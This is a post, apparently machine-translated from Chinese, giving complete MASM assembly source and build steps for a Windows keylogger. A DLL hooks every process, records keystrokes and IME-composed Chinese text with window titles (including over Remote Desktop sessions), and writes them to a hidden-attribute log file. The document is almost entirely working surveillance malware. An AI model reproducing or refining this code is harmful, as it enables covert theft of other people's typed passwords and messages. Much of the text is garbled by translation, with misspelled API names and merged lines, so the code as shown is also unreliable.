Keyboard record support Chinese, 3389 (original)
CZY 04.11.28
Mount WH_CallWndProc (WM_IME_COMPSITION), WH_GETMESSAGE (WM_CHAR and WM_KEYUP), the former records Chinese, the latter records special buttons and letters symbols.
Chinese is tested in the best five and smart ABC, and the system is tested at 2K, XP, 2003 test, including
2Kserver's 3389. (Can't successfully record in cmd)
The record file is in C: /Keylog2.txt. Prevent some people from going to harm. The debug window did not remove it.
Usage: After running a.exe, Key.dll will enter each process and record it.
Cipher parameter:
ML / C / Coff A.ASM
RC hook.rc
Link / Subsystem: Windows A.obj hook.res
ML / C / Coff key.asm
Link /SECTION: C: / Masm32 / bin key.Obj / libsystem: windows / libsystem: windows / libpath: c: / masm32 / bin key.obj
RC file
------------------ Hook.rc -----------------
/>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
#include
/>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
#define ICO_MAIN 1000
#define DLG_MAIN 1000
#define IDC_Text 1001
/>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
ICO_MAIN ICON "main.ico"
/>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>> DLG_MAIN DIALOG 208, 130, 234, 167
STYLE DS_MODALFRAME | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU
CAPTION "Keyboard Hook"
Font 9, "Song"
{
EditText IDC_Text, 5, 5, 224, 158, ES_MULTILINE | ES_AUTOVSCROLL
| WS_BORDER | WS_VSCROLL | WS_TABSTOP | ES_READOONLY
}
/>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
------------------- End ---------------------
Contains files key.inc
------------ Key.inc -------------
Uninstallhook Proto
Installhook Proto, INSTALLHOOK PROTO
------------ End -----------------
DEF file Key.def
------------ KEY.DEF --------------
Library Key.dll
Exports Installhook, EXPORTS INSTALHOOK
Uninstallhook
--------------- End ----------------
-------------------- A.EXE -------------------------- -
.386
.Model flat, stdcall
Option CaseMAP: NONE
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
Include file definition
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>> include ../include/user32.inc
Includelib ../lib/user32.lib
Include ../include/kernel32.inc
Includelib ../lib/kernel32.lib
Include ../include/windows.inc
INCLUDE Key.inc
IncludeLib key.lib
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
; Equorical definition
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
ICO_MAIN EQU 1000
DLG_MAIN EQU 1000
IDC_Text EQU 1001
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
Data segment
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
.DATA?
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
.code
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
_Procdlgmain Proc Uses EBX EDI ESI HWND, WMSG, WPARAM, LPARAM
MOV EAX, WMSG
*********************************************************** *******************
.IF EAX == WM_Close
INVOKE Uninstallhook
Invoke EndDialog, Hwnd, Null
*********************************************************** *******************
.ELSEIF EAX == WM_INITDIALOG
Invoke Installhook, INVOKE INSTALLHOOK
*********************************************************** *******************
.lse
Mov Eax, False
RET
.endif
Mov Eax, True
RET
_PrOCDLGMain ENDP
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
Start:
Invoke getModuleHandle, NULL
Invoke Dialogboxparam, EAX, DLG_MAIN, NULL, OFFSET _PROCDLGMAIN, NULLINVOKE EXITPROCESS, NULL
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
End Start
-------------------------------------------------------------------------------------------- -
--------------------- Key.dll --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
.386
.Model flat, stdcall
Option CaseMAP: NONE
INCLUDE /MASM32/INCLUDE/Windows.inc
INCLUDE /MASM32/INCLUDE/USER32.INC
INCLUDE /MASM32/INCLUDE/kernel32.inc
INCLUDELIB /MASM32/LIB/USER32.LIB
INCLUDELIB /MASM32/LIB/kernel32.lib
Includelib ../lib/imm32.lib
INCLUDE ../include/imm32.inc
IDC_Text EQU 1001
.DATA
Hinstance DD 0
Maintitle DB 'Keyboard Hook', 0
LogkeyFile2 DB 'C: /keylog2.txt' ,0
Keylogformat DB 0DH, 0AH, '- ==% s == -', 0DH, 0AH, 0
; ------ VK -------------
INSERT DB '[INSERT]', 0
Delete DB '[DEL]', 0
Home DB '[Home]', 0
Kend db '[end]', 0
PgDown DB '[PGDN]', 0
PGUP DB '[PGUP]', 0
Down DB '[↓]', 0
Up db '[↑]', 0
LEFT DB '[←]', 0
Right db '[→]', 0
Back db '[<=]', 0
Ctrl db '[ctrl]', 0
Tab DB '[Tab]', 0
Alt db '[alt]', 0; keyboard code is VK_MENU
Shift db '[shift]', 0
Kesc DB '[ESC]', 0
Space db ', 0
PrintScreen DB '[PRTSC]', 0
Capslock DB '[Caps Lock]', 0
Kreturn DB 0DH, 0AH, 0
.DATA?
FORCUSHWND DD?
FHWND DD?
HHOOK DD?
HHOOK2 DD?
Cchar DB 20 DUP (?) CChar2 DB 20 DUP (?)
Keylogbuffer DB 1024 DUP (?); Defines 1KB keyboard recording buffer
HLOGKEYFILE DD?
HACTIVEWINDOW DD?
SVTITLE DB 256 DUP (?); current window title
SZKEYLOGTITLEBUFFER DB 270 DUP (?)
.code
DLlentry Proc Hinstdll: Hinstance, Reason: DWORD, RESERVED1: DWORD
.IF real_process_attach; DLL is loaded
Push Hinstdll
POP Hinstance
.endif
Mov Eax, True
RET
DLLLENTRY ENDP
_Keylog Proc Keyaddr: DWORD
Invoke Findwindow, Null, Offset Maintitle
Invoke Senddlgitemmessage, EAX, IDC_Text, EM_REPLAASEL, 0, KeyAddr
INVOKE GETACTIVEWINDOW
.IF EAX! = HactiveWindow
MOV HACTIVEWINDOW, EAX
Invoke GetWindowText, HactiveWindow, Offset Svtitle, 256
Invoke WSPrintf, Offset Szkeylogtitlebuffer, Offset Keylogformat, Offset Svtitle
Invoke Lstrcat, Offset Keylogbuffer, Offset SzkeyLogtitlebuffer
.endif
Invoke Lstrlen, Offset Keylogbuffer
.IF EAX <10
Invoke Lstrcat, Offset Keylogbuffer, KeyAddr
.lse
Invoke Createfile, Offset LogkeyFile2, Generic_Write, File_Share_Read, /
NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_SYSTEM, NULL
Mov Hlogkeyfile, EAX
Invoke setFilePointer, HLogkeyFile, 0, NULL, FILE_END
Invoke setndoffile, hlogkeyfile; file pointer is placed in the file
Invoke Lstrlen, Offset Keylogbuffer
Invoke _LWRITE, HLOGKEYFILE, OFFSET Keylogbuffer, EAX
Invoke Closehandle, HLogkeyFile
Invoke RTLZERMEMORY, OFFSET Keylogbuffer, 1024
Invoke Lstrcat, Offset Keylogbuffer, KeyAddr
.endif
RET
_Keylog endp
HookProc Proc_dwcode, _wparam, _lparam
Invoke callnexthookex, hhook, _dwcode, _wparam, _lparam
Pushhad
.IF _DWCODE == HC_Action
Mov EBX, _LPARAM
Assume EBX: PTR CWPStruct
; .if [ebx] .Message == WM_IME_CHAR
; MOV DX, Word PTR [EBX] .wparam; xchg DL, DH
; MOV EBX, Offset Cchar
; MOV Word PTR [EBX], DX
Invoke Messageboxa, 0, Addr Cchar, Addr Cchar, 1
; invoke _keylog, addr cchar
.IF [ebx] .Message == WM_IME_COMPSITION
Invoke getfocus
Mov forcushwnd, EAX
Invoke ImmgetContext, ForcushWnd
Mov fHWND, EAX
Invoke ImmgetCompationstring, FHWND, GCS_RESULTSTSTSTR, NULL, 0
Add Eax, Sizeof Wchar
Invoke ImmgetCompationstring, FHWND, GCS_RESULTSTSTR, OFFSET CCHAR, EAX
Invoke Messageboxa, 0, Offset Cchar, Offset Cchar, 1
Invoke lstrcmp, addr cchar, addr cchar2
.if EAX
Invoke _keylog, addr cchar
.endif
Invoke lstrcpy, addr cchar2, addr cchar
Invoke RTLZERMEMORY, OFFSET CCHAR, 20
Invoke ImmreeseContext, ForcushWnd, FHWND
.endif
Assume EBX: Nothing
.endif
Popad
XOR EAX, EAX
RET
HookProc ENDP
HookProc2 proc_dwcode, _wparam, _lparam
Invoke callnexthookex, hhook, _dwcode, _wparam, _lparam
Pushhad
.IF _DWCODE == HC_Action
Mov EBX, _LPARAM
Assume EBX: PTR MSG
.IF [ebx] .Message == WM_KEYUP
Mov Edx, [EBX] .wparam
.IF DL <30h
.IF DL == VK_SPACE
; Invoke _keylog, Addr space
JMP @@ EX
.ELSEIF DL == VK_RETURN
; Invoke _keylog, addr kreturn
JMP @@ EX
.ELSEIF DL == VK_PGDN; DOWN
Invoke _keylog, addr pggdown
JMP @@ EX
.ELSEIF DL == VK_PGUP; UP
Invoke _keylog, Addr PGUP
JMP @@ EX
.ELSEIF DL == VK_Capital
Invoke _keylog, Addr Capslock
JMP @@ EX
.ELSEIF DL == VK_HOME
Invoke _keylog, addr home
JMP @@ EX
.ELSEIF DL == VK_END
Invoke _keylog, addr kend
JMP @@ EX
.ELSEIF DL == VK_DELETE
Invoke _keylog, addr deletejmp @@ EX
.elseif dl == vk_insert
Invoke _keylog, addr insert
JMP @@ EX
.ELSEIF DL == VK_DOWN
Invoke _keylog, Addr Down
JMP @@ EX
.ELSEIF DL == VK_UP
Invoke _keylog, Addr Up
JMP @@ EX
.ELSEIF DL == VK_LEFT
Invoke _keylog, addr leaves
JMP @@ EX
.ELSEIF DL == VK_Right
Invoke _keylog, Addr Right
JMP @@ EX
.ELSEIF DL == VK_Control
; Invoke _keylog, Addr Ctrl
JMP @@ EX
.ELSEIF DL == VK_TAB
Invoke _keylog, Addr Tab
JMP @@ EX
.ELSEIF DL == VK_ESCAPE
Invoke _keylog, Addr Kesc
JMP @@ EX
.elseif dl == vk_snapshot
Invoke _keylog, Addr Printscreen
JMP @@ EX
.ELSEIF DL == VK_MENU
Invoke _keylog, Addr Alt
JMP @@ EX
.endif
.endif
.ELSEIF [EBX] .Message == WM_CHAR
Invoke isdbcsleadbyte, [EBX] .wparam
.IF! EAX
_wparam & pm_remove
MOV DX, Word PTR [EBX] .wparam
.IF DL == VK_BACK
Invoke _keylog, Addr Back
.ELSEIF DL == VK_RETURN
Invoke _keylog, addr kreturn
.ELSEIF DL == VK_SPACE
Invoke _keylog, Addr Space
.lse
Mov EBX, Offset Cchar
MOV Word PTR [EBX], DX
Invoke Messageboxa, 0, Addr Cchar, Addr Cchar, 1
Invoke _keylog, addr cchar
.endif
.endif
.endif
.endif
@@ EX:
Assume EBX: Nothing
.endif
Popad
XOR EAX, EAX
RET
HookProc2 Endp
Installhook Proc
Invoke SetWindowshookex, WH_CallWndProc, Addr HookProc, Hinstance, NULL
Mov hHOOK2, EAX
Invoke SetWindowshookex, Wh_getMessage, Addr HookProc2, Hinstance, Null
Mov Hhook, EAX
RET
INSTALLHOOK ENDP
Uninstallhook Proc
Invoke UnHookWindowshookex, HHOOK
Invoke UnHookWindowshookex, HHOOK2RET
Uninstallhook endp
End dllenTry
----------------------------------------------- End-- -------------------------
